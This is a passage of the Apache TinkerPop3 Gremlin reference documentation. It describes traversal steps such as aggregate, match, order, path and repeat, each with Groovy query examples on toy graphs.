it.\n\n[gremlin-groovy,modern]\n----\ng.V(1).property('country','usa')\ng.V(1).property('city','santa fe').property('state','new mexico').valueMap()\ng.V(1).property(list,'age',35)\ng.V(1).valueMap()\n----\n\n[[aggregate-step]]\nAggregate Step\n~~~~~~~~~~~~~~\n\nimage::aggregate-step.png[width=800]\n\nThe `aggregate()`-step (*sideEffect*) is used to aggregate all the objects at a particular point of traversal into a Collection. The step uses link:http:\/\/en.wikipedia.org\/wiki\/Eager_evaluation[eager evaluation] in that no objects continue on until all previous objects have been fully aggregated (as opposed to <<store-step,`store()`>> which link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazily] fills a collection). The eager evaluation nature is crucial in situations where everything at a particular point is required for future computation. 
An example is provided below.

[gremlin-groovy,modern]
----
g.V(1).out('created') <1>
g.V(1).out('created').aggregate('x') <2>
g.V(1).out('created').aggregate('x').in('created') <3>
g.V(1).out('created').aggregate('x').in('created').out('created') <4>
g.V(1).out('created').aggregate('x').in('created').out('created').
 where(without('x')).values('name') <5>
----

<1> What has marko created?
<2> Aggregate all his creations.
<3> Who are marko's collaborators?
<4> What have marko's collaborators created?
<5> What have marko's collaborators created that he hasn't created?

In link:http://en.wikipedia.org/wiki/Recommender_system[recommendation systems], the above pattern is used:

	"What has userA liked? Who else has liked those things? What have they liked that userA hasn't already liked?"

Finally, `aggregate()`-step can be modulated via `by()`-projection.

[gremlin-groovy,modern]
----
g.V().out('knows').aggregate()
g.V().out('knows').aggregate().by('name')
----

[[and-step]]
And Step
~~~~~~~~

The `and()`-step ensures that all provided traversals yield a result (*filter*). Please see <<or-step,`or()`>> for or-semantics.

[gremlin-groovy,modern]
----
g.V().and(
 outE('knows'),
 values('age').is(lt(30))).
 values('name')
----

The `and()`-step can take an arbitrary number of traversals. All traversals must produce at least one output for the original traverser to pass to the next step.

An link:http://en.wikipedia.org/wiki/Infix_notation[infix notation] can be used as well, though with infix notation, only two traversals can be and'd together.

[gremlin-groovy,modern]
----
g.V().has(outE('created').and().outE('knows')).values('name')
----

[[as-step]]
As Step
~~~~~~~

The `as()`-step is not a real step, but a "step modulator" similar to <<by-step,`by()`>> and <<option-step,`option()`>>. With `as()`, it is possible to provide a label to the step that can later be accessed by steps and data structures that make use of such labels -- e.g., <<select-step,`select()`>>, <<match-step,`match()`>>, and path.

[gremlin-groovy,modern]
----
g.V().as('a').out('created').as('b').select() <1>
g.V().as('a').out('created').as('b').select().by('name') <2>
----

<1> Select the objects labeled "a" and "b" from the path.
<2> Select the objects labeled "a" and "b" from the path and, for each object, project its name value.

A step can have any number of labels associated with it. This is useful for referencing the same step multiple times in a future step.

[gremlin-groovy,modern]
----
g.V().hasLabel('software').as('a','b','c').
 select().
 by('name').
 by('lang').
 by(__.in('created').values('name').fold())
----

[[by-step]]
By Step
~~~~~~~

The `by()`-step is not an actual step, but instead is a "step-modulator" similar to <<as-step,`as()`>> and <<option-step,`option()`>>. If a step is able to accept traversals, functions, comparators, etc., then `by()` is the means by which they are added. The general pattern is `step().by()...by()`.
Some steps can only accept one `by()` while others can take an arbitrary amount.

[gremlin-groovy,modern]
----
g.V().group().by(bothE().count()) <1>
g.V().group().by(bothE().count()).by('name') <2>
g.V().group().by(bothE().count()).by('name').by(count(local)) <3>
----

<1> `by(bothE().count())` will group the elements by their edge count (*traversal*).
<2> `by('name')` will process the grouped elements by their name (*element property projection*).
<3> `by(count(local))` will count the number of elements in each group (*traversal*).

[[coalesce-step]]
Coalesce Step
~~~~~~~~~~~~~

The `coalesce()`-step evaluates the provided traversals in order and returns the first traversal that emits at least one element.

[gremlin-groovy,modern]
----
g.V(1).coalesce(outE('knows'), outE('created')).inV().path().by('name').by(label)
g.V(1).coalesce(outE('created'), outE('knows')).inV().path().by('name').by(label)
g.V(1).next().property('nickname', 'okram')
g.V().hasLabel('person').coalesce(values('nickname'), values('name'))
----

[[count-step]]
Count Step
~~~~~~~~~~

image::count-step.png[width=195]

The `count()`-step (*map*) counts the total number of represented traversers in the streams (i.e. the bulk count).

[gremlin-groovy,modern]
----
g.V().count()
g.V().hasLabel('person').count()
g.V().hasLabel('person').outE('created').count().path() <1>
g.V().hasLabel('person').outE('created').count().map {it.get() * 10}.path() <2>
----

<1> `count()`-step is a <<a-note-on-barrier-steps,reducing barrier step>> meaning that all of the previous traversers are folded into a new traverser.
<2> The path of the traverser emanating from `count()` starts at `count()`.

IMPORTANT: `count(local)` counts the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, a count of 1 is returned.

[[choose-step]]
Choose Step
~~~~~~~~~~~

image::choose-step.png[width=700]

The `choose()`-step (*branch*) routes the current traverser to a particular traversal branch option. With `choose()`, it is possible to implement if/else-based semantics as well as more complicated selections.

[gremlin-groovy,modern]
----
g.V().hasLabel('person').
 choose(values('age').is(lte(30)),
 __.in(),
 __.out()).values('name') <1>
g.V().hasLabel('person').
 choose(values('age')).
 option(27, __.in()).
 option(32, __.out()).values('name') <2>
----

<1> If the traversal yields an element, then do `in`, else do `out` (i.e. true/false-based option selection).
<2> Use the result of the traversal as a key to the map of traversal options (i.e. value-based option selection).

However, note that `choose()` can have an arbitrary number of options and moreover, can take an anonymous traversal as its choice function.

[gremlin-groovy,modern]
----
g.V().hasLabel('person').
 choose(values('name')).
 option('marko', values('age')).
 option('josh', values('name')).
 option('vadas', valueMap()).
 option('peter', label())
----

The `choose()`-step can leverage the `Pick.none` option match. For anything that does not match a specified option, the `none`-option is taken.

[gremlin-groovy,modern]
----
g.V().hasLabel('person').
 choose(values('name')).
 option('marko', values('age')).
 option(none, values('name'))
----

[[coin-step]]
Coin Step
~~~~~~~~~

To randomly filter out a traverser, use the `coin()`-step (*filter*).
The provided double argument biases the "coin toss."

[gremlin-groovy,modern]
----
g.V().coin(0.5)
g.V().coin(0.0)
g.V().coin(1.0)
----

[[cyclicpath-step]]
CyclicPath Step
~~~~~~~~~~~~~~~

image::cyclicpath-step.png[width=400]

Each traverser maintains its history through the traversal over the graph -- i.e. its <<path-data-structure,path>>. If it is important that the traverser repeat its course, then `cyclicPath()`-step should be used (*filter*). The step analyzes the path of the traverser thus far and if there are any repeats, the traverser is filtered out of the traversal computation. If non-cyclic behavior is desired, see <<simplepath-step,`simplePath()`>>.

[gremlin-groovy,modern]
----
g.V(1).both().both()
g.V(1).both().both().cyclicPath()
g.V(1).both().both().cyclicPath().path()
----

[[dedup-step]]
Dedup Step
~~~~~~~~~~

With `dedup()`-step (*filter*), repeatedly seen objects are removed from the traversal stream. Note that if a traverser's bulk is greater than 1, then it is set to 1 before being emitted.

[gremlin-groovy,modern]
----
g.V().values('lang')
g.V().values('lang').dedup()
g.V(1).repeat(bothE('created').dedup().otherV()).emit().path() <1>
----

<1> Traverse all `created` edges, but don't touch any edge twice.

If a by-step modulation is provided to `dedup()`, then the object is processed accordingly prior to determining if it has been seen or not.

[gremlin-groovy,modern]
----
g.V().valueMap(true, 'name')
g.V().dedup().by(label).values('name')
----

WARNING: The `dedup()`-step does not have a correlate in <<traversalvertexprogram,Gremlin OLAP>> when used mid-traversal. When in mid-traversal, de-duplication only occurs at the current processing vertex and thus, is not a global operation as it is in Gremlin OLTP. When `dedup()` is an end step, the resultant traversers are de-duplicated by `TraverserMapReduce`.

[[drop-step]]
Drop Step
~~~~~~~~~

The `drop()`-step (*filter*/*sideEffect*) is used to remove elements and properties from the graph. It is a filter step because the traversal yields no outgoing objects.

[gremlin-groovy,modern]
----
g.V().outE().drop()
g.E()
g.V().properties('name').drop()
g.V().valueMap()
g.V().drop()
g.V()
----

[[fold-step]]
Fold Step
~~~~~~~~~

There are situations when the traversal stream needs a "barrier" to aggregate all the objects and emit a computation that is a function of the aggregate. The `fold()`-step (*map*) is one particular instance of this.
Please see <<unfold-step,`unfold()`>>-step for the inverse functionality.

[gremlin-groovy,modern]
----
g.V(1).out('knows').values('name')
g.V(1).out('knows').values('name').fold() <1>
g.V(1).out('knows').values('name').fold().next().getClass() <2>
g.V(1).out('knows').values('name').fold(0) {a,b -> a + b.length()} <3>
g.V().values('age').fold(0) {a,b -> a + b} <4>
g.V().values('age').fold(0, sum) <5>
g.V().values('age').sum() <6>
----

<1> A parameterless `fold()` will aggregate all the objects into a list and then emit the list.
<2> A verification of the type of list returned.
<3> `fold()` can be provided two arguments -- a seed value and a reduce bi-function ("vadas" is 5 characters + "josh" with 4 characters).
<4> What is the total age of the people in the graph?
<5> The same as before, but using a built-in bi-function.
<6> The same as before, but using the <<sum-step,`sum()`-step>>.

[[group-step]]
Group Step
~~~~~~~~~~

As traversers propagate across a graph as defined by a traversal, sideEffect computations are sometimes required. That is, the actual path taken or the current location of a traverser is not the ultimate output of the computation, but some other representation of the traversal. The `group()`-step (*sideEffect*) is one such sideEffect that organizes the objects according to some function of the object. Then, if required, that organization (a list) is reduced. An example is provided below.

[gremlin-groovy,modern]
----
g.V().group().by(label) <1>
g.V().group().by(label).by('name') <2>
g.V().group().by(label).by('name').by(count(local)) <3>
----

<1> Group the vertices by their label.
<2> For each vertex in the group, get their name.
<3> For each grouping, what is its size?

The three projection parameters available to `group()` via `by()` are:

. Key-projection: What feature of the object to group on (a function that yields the map key)?
. Value-projection: What feature of the group to store in the key-list?
. Reduce-projection: What feature of the key-list to ultimately return?

WARNING: The `group()`-step does not have a correlate in <<traversalvertexprogram,Gremlin OLAP>> when used mid-traversal. When in mid-traversal, grouping only occurs at the current processing vertex and thus, is not a global operation as it is in Gremlin OLTP. However, `GroupMapReduce` provides unified groups at the end of the traversal computation.

[[groupcount-step]]
GroupCount Step
~~~~~~~~~~~~~~~

When it is important to know how many times a particular object has been at a particular part of a traversal, `groupCount()`-step (*sideEffect*) is used.

	"What is the distribution of ages in the graph?"

[gremlin-groovy,modern]
----
g.V().hasLabel('person').values('age').groupCount()
g.V().hasLabel('person').groupCount().by('age') <1>
----

<1> You can also supply a pre-group projection, where the provided <<by-step,`by()`>>-modulation determines what to group the incoming object by.

There is one person that is 32, one person that is 35, one person that is 27, and one person that is 29.

	"Iteratively walk the graph and count the number of times you see each vertex label."

image::groupcount-step.png[width=420]

[gremlin-groovy,modern]
----
g.V().repeat(both().groupCount('m').by(label)).times(10).cap('m')
----

The above is interesting in that it demonstrates the use of referencing the internal `Map<Object,Long>` of `groupCount()` with a string variable.
Given that `groupCount()` is a sideEffect-step, it simply passes the object it received to its output. Internal to `groupCount()`, the object's count is incremented.

WARNING: The `groupCount()`-step does not have a correlate in <<traversalvertexprogram,Gremlin OLAP>> when used mid-traversal. When in mid-traversal, grouping only occurs at the current processing vertex and thus, is not a global operation as it is in Gremlin OLTP. However, `GroupCountMapReduce` provides unified groups at the end of the traversal computation.

[[has-step]]
Has Step
~~~~~~~~

image::has-step.png[width=670]

It is possible to filter vertices, edges, and vertex properties based on their properties using `has()`-step (*filter*). There are numerous variations on `has()` including:

 * `has(key,value)`: Remove the traverser if its element does not have the provided key/value property.
 * `has(key,predicate)`: Remove the traverser if its element does not have a key value that satisfies the bi-predicate.
 * `hasLabel(labels...)`: Remove the traverser if its element does not have any of the labels.
 * `hasId(ids...)`: Remove the traverser if its element does not have any of the ids.
 * `hasKey(keys...)`: Remove the traverser if its property does not have any of the keys.
 * `hasValue(values...)`: Remove the traverser if its property does not have any of the values.
 * `has(key)`: Remove the traverser if its element does not have a value for the key.
 * `hasNot(key)`: Remove the traverser if its element has a value for the key.
 * `has(traversal)`: Remove the traverser if its object does not yield a result through the traversal.

[gremlin-groovy,modern]
----
g.V().hasLabel('person')
g.V().hasLabel('person').out().has('name',within('vadas','josh'))
g.V().hasLabel('person').out().has('name',within('vadas','josh')).
 outE().hasLabel('created')
g.V().has('age',inside(20,30)).values('age') <1>
g.V().has('age',outside(20,30)).values('age') <2>
----

<1> Find all vertices whose ages are between 20 (exclusive) and 30 (exclusive).
<2> Find all vertices whose ages are not between 20 (exclusive) and 30 (exclusive).

It is also possible to filter any arbitrary object based on an anonymous traversal yielding at least one result.

[gremlin-groovy,modern]
----
g.V().has(out('created')).values('name') <1>
g.V().out('knows').has(out('created')).values('name') <2>
g.V().has(out('created').count().is(gte(2L))).values('name') <3>
g.V().has(out('knows').has(out('created'))).values('name') <4>
----

<1> What are the names of the people who have created a project?
<2> What are the names of the people that are known by someone and have created a project?
<3> What are the names of the people who have created two or more projects?
<4> What are the names of the people who know someone that has created a project? (This only works in OLTP -- see the `WARNING` below)

WARNING: The anonymous traversal of `has()` processes the current object "locally". In OLAP, where the atomic unit of computing is the vertex and its local "star graph," it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.

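To make the `has(key)`/`hasNot(key)` distinction concrete, here is a small sketch; it assumes the modern toy graph, where person vertices carry an age-property and software vertices do not.

[gremlin-groovy,modern]
----
g.V().has('age').values('name') <1>
g.V().hasNot('age').values('name') <2>
----

<1> Only elements that have an age-property pass -- the person vertices.
<2> Only elements that do not have an age-property pass -- the software vertices.
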
[[inject-step]]
Inject Step
~~~~~~~~~~~

image::inject-step.png[width=800]

One of the major features of TinkerPop3 is "injectable steps." This makes it possible to insert objects arbitrarily into a traversal stream. In general, `inject()`-step (*sideEffect*) exists and a few examples are provided below.

[gremlin-groovy,modern]
----
g.V(4).out().values('name').inject('daniel')
g.V(4).out().values('name').inject('daniel').map {it.get().length()}
g.V(4).out().values('name').inject('daniel').map {it.get().length()}.path()
----

In the last example above, note that the path starting with `daniel` is only of length 2. This is because the `daniel` string was inserted half-way in the traversal. Finally, a typical use case is provided below -- when the start of the traversal is not a graph object.

[gremlin-groovy,modern]
----
inject(1,2)
inject(1,2).map {it.get() + 1}
inject(1,2).map {it.get() + 1}.map {g.V(it.get()).next()}.values('name')
----

[[is-step]]
Is Step
~~~~~~~

It is possible to filter scalar values using `is()`-step (*filter*).

[gremlin-groovy,modern]
----
g.V().values('age').is(32)
g.V().values('age').is(lte(30))
g.V().values('age').is(inside(30, 40))
g.V().has(__.in('created').count().is(1l)).values('name') <1>
g.V().has(__.in('created').count().is(gte(2l))).values('name') <2>
g.V().has(__.in('created').values('age').
 mean().is(inside(30d, 35d))).values('name') <3>
----

<1> Find projects having exactly one contributor.
<2> Find projects having two or more contributors.
<3> Find projects whose contributors' average age is between 30 and 35.

[[limit-step]]
Limit Step
~~~~~~~~~~

The `limit()`-step is analogous to <<range-step,`range()`-step>> save that the lower end range is set to 0.

[gremlin-groovy,modern]
----
g.V().limit(2)
g.V().range(0, 2)
g.V().limit(2).toString()
----

[[local-step]]
Local Step
~~~~~~~~~~

image::local-step.png[width=450]

A `GraphTraversal` operates on a continuous stream of objects. In many situations, it is important to operate on a single element within that stream. To do such object-local traversal computations, `local()`-step exists (*branch*). Note that the examples below use the <<the-crew-toy-graph,The Crew>> toy data set.

[gremlin-groovy,theCrew]
----
g.V().as('person').
 properties('location').order().by('startTime',incr).limit(2).
 value().as('location').select().by('name').by() <1>
g.V().as('person').
 local(properties('location').order().by('startTime',incr).limit(2)).
 value().as('location').select().by('name').by() <2>
----

<1> Get the first two people and their respective location according to the most historic location start time.
<2> For every person, get their two most historic locations.

The two traversals above look nearly identical save the inclusion of `local()`, which wraps a section of the traversal in an object-local traversal. As such, the `order().by()` and the `limit()` refer to a particular object, not to the stream as a whole.

WARNING: The anonymous traversal of `local()` processes the current object "locally." In OLAP, where the atomic unit of computing is the vertex and its local "star graph," it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.

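One more hedged sketch of the stream-global versus object-local distinction, this time assuming the modern toy graph rather than The Crew:

[gremlin-groovy,modern]
----
g.V().outE().limit(1) <1>
g.V().local(outE().limit(1)) <2>
----

<1> A stream-global limit: one edge in total, taken from the whole stream.
<2> An object-local limit: at most one outgoing edge per vertex.
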
[[match-step]]
Match Step
~~~~~~~~~~

The `match()`-step (*map*) is introduced into TinkerPop3 to support a more link:http://en.wikipedia.org/wiki/Declarative_programming[declarative] form of link:http://en.wikipedia.org/wiki/Pattern_matching[pattern matching]. Similar constructs were available in previous TinkerPop versions via the `table()`-step, but that has since been removed in favor of the `match().select()`-pattern. With MatchStep in TinkerPop, a query optimizer similar to the link:http://www.knowledgefrominformation.com/2011/04/16/budget-match-cost-effective-subgraph-matching-on-large-networks/[budget match algorithm] builds and revises query plans on the fly, while a query is in progress. For very large graphs, where the developer is uncertain of the statistics of the graph (e.g. how many `knows`-edges vs. `worksFor`-edges exist in the graph), it is advantageous to use `match()`, as an optimal plan will be determined automatically. Furthermore, some queries are much easier to express via `match()` than with single-path traversals.

	"Who created a project named 'lop' that was also created by someone who is 29 years old? Return the two creators."

image::match-step.png[width=500]

[gremlin-groovy,modern]
----
g.V().match('a',
 __.as('a').out('created').as('b'),
 __.as('b').has('name', 'lop'),
 __.as('b').in('created').as('c'),
 __.as('c').has('age', 29)).select('a','c').by('name')
----

Note that the above can also be more concisely written as below, which demonstrates that imperative inner-traversals can be arbitrarily defined.

[gremlin-groovy,modern]
----
g.V().match('a',
 __.as('a').out('created').has('name', 'lop').as('b'),
 __.as('b').in('created').has('age', 29).as('c')).select('a','c').by('name')
----

[[grateful-dead]]
.Grateful Dead
image::grateful-dead-schema.png[width=475]

MatchStep brings functionality similar to link:http://en.wikipedia.org/wiki/SPARQL[SPARQL] to Gremlin. Like SPARQL, MatchStep conjoins a set of patterns applied to a graph. For example, the following traversal finds exactly those songs which Jerry Garcia has both sung and written (using the Grateful Dead graph distributed in the `data/` directory):

[gremlin-groovy]
----
graph.io(graphml()).readGraph('data/grateful-dead.xml')
g = graph.traversal(standard())
g.V().match('a',
 __.as('a').has('name', 'Garcia'),
 __.as('a').in('writtenBy').as('b'),
 __.as('a').in('sungBy').as('b')).select('b').values('name')
----

Among the features which differentiate `match()` from SPARQL are:

[gremlin-groovy,modern]
----
g.V().match('a',
 __.as('a').out('created').has('name','lop').as('b'), <1>
 __.as('b').in('created').has('age', 29).as('c'),
 __.as('c').repeat(out()).times(2)). <2>
 select('c').out('knows').dedup().values('name') <3>
----

<1> *Patterns of arbitrary complexity*: `match()` is not restricted to triple patterns or property paths.
<2> *Recursion support*: `match()` supports the branch-based steps within a pattern, including `repeat()`.
<3> *Imperative/declarative hybrid*: Before and after a `match()`, it is possible to leverage classic, imperative Gremlin.

To extend point #3, it is possible to support going from imperative, to declarative, to imperative, ad infinitum.

[gremlin-groovy,modern]
----
g.V().match('a',
 __.as('a').out('knows').as('b'),
 __.as('b').out('created').has('name','lop')).
 select('b').out('created').
 match('a',
 __.as('a').in('created').as('b'),
 __.as('b').out('knows').as('c')).
 select('c').values('name')
----

Like all other steps in Gremlin, `match()` is a function and thus, `match()` within `match()` is a natural consequence of Gremlin's functional foundation (i.e. recursive matching).

[gremlin-groovy,modern]
----
g.V().match('a',
 __.as('a').out('knows').as('b'),
 __.as('b').out('created').has('name','lop'),
 __.as('b').match('x',
 __.as('x').out('created').as('y'),
 __.as('y').has('name','ripple')).
 select('y').as('c')).
 select('a','c').by('name')
----

WARNING: Currently, `match()` does not operate within a multi-JVM <<graphcomputer,GraphComputer>> OLAP environment. Future work includes a linearization <<traversalstrategy,TraversalStrategy>> for `match()`.

[[using-where-with-match]]
Using Where with Match
^^^^^^^^^^^^^^^^^^^^^^

Match is typically used in conjunction with both `select()` (demonstrated previously) and `where()` (presented here). A `where()` allows the user to further constrain the result set provided by `match()`.

[gremlin-groovy,modern]
----
g.V().match('a',
 __.as('a').out('created').as('b'),
 __.as('b').in('created').as('c')).
 where('a', neq('c')).select('a','c').by('name')
----

The `where()`-step can take either a `BiPredicate` (first example below) or a `Traversal` (second example below). Using `MatchWhereStrategy`, `where()`-clauses can be automatically folded into `match()` and thus, subject to `match()`-step's budget-match algorithm.

[gremlin-groovy,modern]
----
traversal = g.V().match('a',
 __.as('a').out('created').as('b'),
 __.as('b').in('created').as('c')).
 where(__.as('a').out('knows').as('c')). <1>
 select('a','c').by('name'); null <2>
traversal.toString() <3>
traversal <4> <5>
traversal.toString() <6>
----

<1> A `where()`-step with a traversal containing variable bindings declared in `match()`.
<2> A useful trick to ensure that the traversal is not iterated by Gremlin Console.
<3> The string representation of the traversal prior to its strategies being applied.
<4> The Gremlin Console will automatically iterate anything that is an iterator or is iterable.
<5> Both marko and josh are co-developers and marko knows josh.
<6> The string representation of the traversal after the strategies have been applied (and thus, `where()` is folded into `match()`).

[[max-step]]
Max Step
~~~~~~~~

The `max()`-step (*map*) operates on a stream of numbers and determines which is the largest number in the stream.

[gremlin-groovy,modern]
----
g.V().values('age').max()
g.V().repeat(both()).times(3).values('age').max()
----

IMPORTANT: `max(local)` determines the max of the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Number`-type objects. For any other object, a max of `Double.NaN` is returned.

[[mean-step]]
Mean Step
~~~~~~~~~

The `mean()`-step (*map*) operates on a stream of numbers and determines the average of those numbers.

[gremlin-groovy,modern]
----
g.V().values('age').mean()
g.V().repeat(both()).times(3).values('age').mean() <1>
g.V().repeat(both()).times(3).values('age').dedup().mean()
----

<1> Realize that traversers are being bulked by `repeat()`. There may be more of a particular number than another, thus altering the average.

IMPORTANT: `mean(local)` determines the mean of the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Number`-type objects. For any other object, a mean of `Double.NaN` is returned.

[[min-step]]
Min Step
~~~~~~~~

The `min()`-step (*map*) operates on a stream of numbers and determines which is the smallest number in the stream.

[gremlin-groovy,modern]
----
g.V().values('age').min()
g.V().repeat(both()).times(3).values('age').min()
----

IMPORTANT: `min(local)` determines the min of the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Number`-type objects. For any other object, a min of `Double.NaN` is returned.

[[or-step]]
Or Step
~~~~~~~

The `or()`-step ensures that at least one of the provided traversals yields a result (*filter*). Please see <<and-step,`and()`>> for and-semantics.

[gremlin-groovy,modern]
----
g.V().or(
 __.outE('created'),
 __.inE('created').count().is(gt(1l))).
 values('name')
----

The `or()`-step can take an arbitrary number of traversals. At least one of the traversals must produce at least one output for the original traverser to pass to the next step.

An link:http://en.wikipedia.org/wiki/Infix_notation[infix notation] can be used as well, though with infix notation, only two traversals can be or'd together.

[gremlin-groovy,modern]
----
g.V().has(outE('created').or().outE('knows')).values('name')
----

[[order-step]]
Order Step
~~~~~~~~~~

When the objects of the traversal stream need to be sorted, `order()`-step (*map*) can be leveraged.

[gremlin-groovy,modern]
----
g.V().values('name').order()
g.V().values('name').order().by(decr)
g.V().hasLabel('person').order().by('age', incr).values('name')
----

One of the most traversed objects in a traversal is an `Element`. An element can have properties associated with it (i.e. key/value pairs). In many situations, it is desirable to sort an element traversal stream according to a comparison of their properties.

[gremlin-groovy,modern]
----
g.V().values('name')
g.V().order().by('name',incr).values('name')
g.V().order().by('name',decr).values('name')
----

The `order()`-step allows the user to provide an arbitrary number of comparators for primary, secondary, etc. sorting. In the example below, the primary ordering is based on the outgoing created-edge count. The secondary ordering is based on the age of the person.

[gremlin-groovy,modern]
----
g.V().hasLabel('person').order().by(outE('created').count(), incr).
 by('age', incr).values('name')
g.V().hasLabel('person').order().by(outE('created').count(), incr).
 by('age', decr).values('name')
----

Randomizing the order of the traversers at a particular point in the traversal is possible with `Order.shuffle`.

[gremlin-groovy,modern]
----
g.V().hasLabel('person').order().by(shuffle)
g.V().hasLabel('person').order().by(shuffle)
----

IMPORTANT: `order(local)` orders the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, the object is returned unchanged.

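A brief, hedged sketch of `order(local)` per the note above (modern toy graph assumed): a folded `Collection` is a single local object that can be sorted in place.

[gremlin-groovy,modern]
----
g.V().values('name').fold() <1>
g.V().values('name').fold().order(local) <2>
----

<1> Fold the names into a single `Collection`.
<2> Order the members of that local `Collection`, emitting one sorted list.
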
[[path-step]]
Path Step
~~~~~~~~~

A traverser is transformed as it moves through a series of steps within a traversal. The history of the traverser is realized by examining its path with `path()`-step (*map*).

image::path-step.png[width=650]

[gremlin-groovy,modern]
----
g.V().out().out().values('name')
g.V().out().out().values('name').path()
----

If edges are required in the path, then be sure to traverse those edges explicitly.

[gremlin-groovy,modern]
----
g.V().outE().inV().outE().inV().path()
----

It is possible to post-process the elements of the path in a round-robin fashion via `by()`.

[gremlin-groovy,modern]
----
g.V().out().out().path().by('name').by('age')
----

Finally, because of `by()`-based post-processing, nothing prevents triggering yet another traversal. In the traversal below, for each element of the path traversed thus far, if it is a person (as determined by having an `age`-property), then get all of their creations, else if it is a creation, get all the people that created it.

[gremlin-groovy,modern]
----
g.V().out().out().path().by(
 choose(hasLabel('person'),
 out('created').values('name'),
 __.in('created').values('name')).fold())
----

WARNING: Generating path information is expensive as the history of the traverser is stored into a Java list. With numerous traversers, there are numerous lists. Moreover, in an OLAP <<graphcomputer,`GraphComputer`>> environment this becomes exceedingly prohibitive as there are traversers emanating from all vertices in the graph in parallel. In OLAP there are optimizations provided for traverser populations, but when paths are calculated (and each traverser is unique due to its history), then these optimizations are no longer possible.

[[path-data-structure]]
Path Data Structure
^^^^^^^^^^^^^^^^^^^

The `Path` data structure is an ordered list of objects, where each object is associated to a `Set<String>` of labels. An example is presented below to demonstrate both the `Path` API as well as how a traversal yields labeled paths.

image::path-data-structure.png[width=350]

[gremlin-groovy,modern]
----
path = g.V(1).as('a').has('name').as('b').
 out('knows').out('created').as('c').
 has('name','ripple').values('name').as('d').
 identity().as('e').path().next()
path.size()
path.objects()
path.labels()
path.a
path.b
path.c
path.d == path.e
----

[[profile-step]]
Profile Step
~~~~~~~~~~~~

The `profile()`-step (*sideEffect*) exists to allow developers to profile their traversals to determine statistical information like step runtime, counts, etc.

WARNING: Profiling a Traversal will impede the Traversal's performance. This overhead is mostly excluded from the profile results, but durations are not exact. Thus, durations are best considered in relation to each other.

[gremlin-groovy,modern]
----
g.V().out('created').repeat(both()).times(3).hasLabel('person').values('age').sum().profile().cap(TraversalMetrics.METRICS_KEY)
----

The `profile()`-step generates a `TraversalMetrics` sideEffect object that contains the following information:

* `Step`: A step within the traversal being profiled.
* `Count`: The number of _represented_ traversers that passed through the step.
* `Traversers`: The number of traversers that passed through the step.
* `Time (ms)`: The total time the step was actively executing its behavior.
* `% Dur`: The percentage of total time spent in the step.

image:gremlin-exercise.png[width=120,float=left] It is important to understand the difference between `Count` and `Traversers`.
Traversers can be merged and as such, when two traversers are "the same" they may be aggregated into a single traverser. That new traverser has a `Traverser.bulk()` that is the sum of the two merged traverser bulks. On the other hand, the `Count` represents the sum of all `Traverser.bulk()` results and thus, expresses the number of "represented" (not enumerated) traversers. `Traversers` will always be less than or equal to `Count`.

[[range-step]]
Range Step
~~~~~~~~~~

As traversers propagate through the traversal, it is possible to only allow a certain number of them to pass through with `range()`-step (*filter*). When the low-end of the range is not met, objects continue to be iterated. When within the low (inclusive) and high (exclusive) range, traversers are emitted. Finally, when above the high range, the traversal breaks out of iteration.

[gremlin-groovy,modern]
----
g.V().range(0,3)
g.V().range(1,3)
g.V().repeat(both()).times(1000000).emit().range(6,10)
----

[[repeat-step]]
Repeat Step
~~~~~~~~~~~

image::gremlin-fade.png[width=350]

The `repeat()`-step (*branch*) is used for looping over a traversal given some break predicate. Below are some examples of `repeat()`-step in action.

[gremlin-groovy,modern]
----
g.V(1).repeat(out()).times(2).path().by('name') <1>
g.V().until(has('name','ripple')).
 repeat(out()).path().by('name') <2>
----

<1> do-while semantics stating to do `out()` 2 times.
<2> while-do semantics stating to break if the traverser is at a vertex named "ripple".

IMPORTANT: There are two modulators for `repeat()`: `until()` and `emit()`. If `until()` comes after `repeat()` it is do/while looping. If `until()` comes before `repeat()` it is while/do looping. If `emit()` is placed after `repeat()`, it is evaluated on the traversers leaving the repeat-traversal. If `emit()` is placed before `repeat()`, it is evaluated on the traversers prior to entering the repeat-traversal.

The `repeat()`-step also supports an "emit predicate", where the predicate for an empty argument `emit()` is true (i.e. `emit() == emit{true}`). With `emit()`, the traverser is split in two -- the traverser exits the code block as well as continues back within the code block (assuming `until()` holds true).

[gremlin-groovy,modern]
----
g.V(1).repeat(out()).times(2).emit().path().by('name') <1>
g.V(1).emit().repeat(out()).times(2).path().by('name') <2>
----

<1> The `emit()` comes after `repeat()` and thus, emission happens after the `repeat()` traversal is executed. Thus, no one-vertex paths exist.
<2> The `emit()` comes before `repeat()` and thus, emission happens prior to the `repeat()` traversal being executed. Thus, one-vertex paths exist.

The `emit()`-modulator can take an arbitrary predicate.

[gremlin-groovy,modern]
----
g.V(1).repeat(out()).times(2).emit(has('lang')).path().by('name')
----

image::repeat-step.png[width=500]

[gremlin-groovy,modern]
----
g.V(1).repeat(out()).times(2).emit().path().by('name')
----

The first time through the `repeat()`, the vertices lop, vadas, and josh are seen. Given that `loops==0`, the traverser repeats. However, because the emit-predicate is declared true, those vertices are emitted. At step 2 (`loops==1`), the vertices traversed are ripple and lop (josh's created projects, as lop and vadas have no out edges) and are also emitted. Now `loops==1`, so the traverser repeats. As ripple and lop have no out edges, there are no vertices to traverse.
Given that `loops==2`, the until-predicate is satisfied and the loop ends. In total, the traverser has seen the vertices: lop, vadas, josh, ripple, and lop.

Finally, note that both `emit()` and `until()` can take a traversal and, in such situations, the predicate is determined by `traversal.hasNext()`. A few examples are provided below.

[gremlin-groovy,modern]
----
g.V(1).repeat(out()).until(hasLabel('software')).path().by('name') <1>
g.V(1).emit(hasLabel('person')).repeat(out()).path().by('name') <2>
g.V(1).repeat(out()).until(outE().count().is(0L)).path().by('name') <3>
----

<1> Starting from vertex 1, keep taking outgoing edges until a software vertex is reached.
<2> Starting from vertex 1, and in an infinite loop, emit the vertex if it is a person and then traverse the outgoing edges.
<3> Starting from vertex 1, keep taking outgoing edges until a vertex is reached that has no more outgoing edges.

